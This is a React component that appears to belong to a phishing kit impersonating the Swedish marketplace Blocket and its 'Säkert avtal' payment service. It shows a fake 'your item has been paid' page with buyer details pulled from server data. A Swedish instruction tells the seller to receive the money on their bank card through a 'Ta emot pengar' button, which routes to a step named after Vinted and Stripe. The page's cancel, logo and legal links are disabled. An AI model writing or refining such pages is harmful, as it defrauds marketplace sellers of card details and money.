import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './BlocketSeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/blocket-se-wordmark.svg`;

function noop(e) {
  e.preventDefault();
}

const INSTRUCTION =
  'Ta emot pengarna på ditt bankkort och skicka varorna till den adress som köparen har angett. När varorna skickas, informera köparen om leveransnumret. Varorna måste skickas inom 7 dagar efter att pengarna mottagits.';

const LEGAL =
  "Genom att klicka på knappen 'Ta emot pengar' godkänner du köpeavtalet för varor via onlinetjänsten 'Säkert avtal'.";

/**
 * Blocket (SE) — säkert avtal / utbetalning, CTA → index2 (VintedStripe2).
 */
function BlocketSeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'SE').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'SEK';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const productName = (pageData?.product_name || '').trim() || '—';
  const buyerName = [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const deliveryAddr = (pageData?.delivery_address || '').trim() || '—';
  const photoUrl = (pageData?.photo_url || '').trim();
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="blocket-se-wrap" lang="sv">
        <div className="blocket-se-loading">Laddar…</div>
        <div className="blocket-se-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="blocket-se-wrap" lang="sv">
      <header className="blocket-se-header">
        <a href="#/" className="blocket-se-logo-link" onClick={noop} aria-label="Blocket">
          <img src={LOGO_SRC} alt="" className="blocket-se-logo" width={151} height={32} />
        </a>
        <a href="#/" className="blocket-se-cancel" onClick={noop}>
          Avbryt
        </a>
      </header>

      <main className="blocket-se-main">
        <h1 className="blocket-se-title">Din vara har betalats</h1>

        <div className="blocket-se-summary">
          {photoUrl ? (
            <img src={photoUrl} alt="" className="blocket-se-thumb" />
          ) : (
            <div className="blocket-se-thumb blocket-se-thumb--placeholder" aria-hidden />
          )}
          <div className="blocket-se-summary-text">
            <p className="blocket-se-product-name">{productName}</p>
            <p className="blocket-se-buyer-line">
              Köpare: {buyerName}
            </p>
            <p className="blocket-se-price-line">{amountLine}</p>
          </div>
        </div>

        <div className="blocket-se-rows">
          <div className="blocket-se-row">
            <span className="blocket-se-row-label">Mottaget belopp</span>
            <span className="blocket-se-row-value">{amountLine}</span>
          </div>
          <div className="blocket-se-row">
            <span className="blocket-se-row-label">Mottagarens namn</span>
            <span className="blocket-se-row-value">{buyerName}</span>
          </div>
          <div className="blocket-se-row">
            <span className="blocket-se-row-label">Mottagarens adress</span>
            <span className="blocket-se-row-value">{deliveryAddr}</span>
          </div>
        </div>

        <p className="blocket-se-instruction">{INSTRUCTION}</p>

        <Link to={index2Path} className="blocket-se-cta">
          Ta emot pengar
        </Link>

        <p className="blocket-se-legal">
          <a href="#/" className="blocket-se-legal-link" onClick={noop}>
            {LEGAL}
          </a>
        </p>
      </main>

      <div className="blocket-se-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default BlocketSeSuccess;
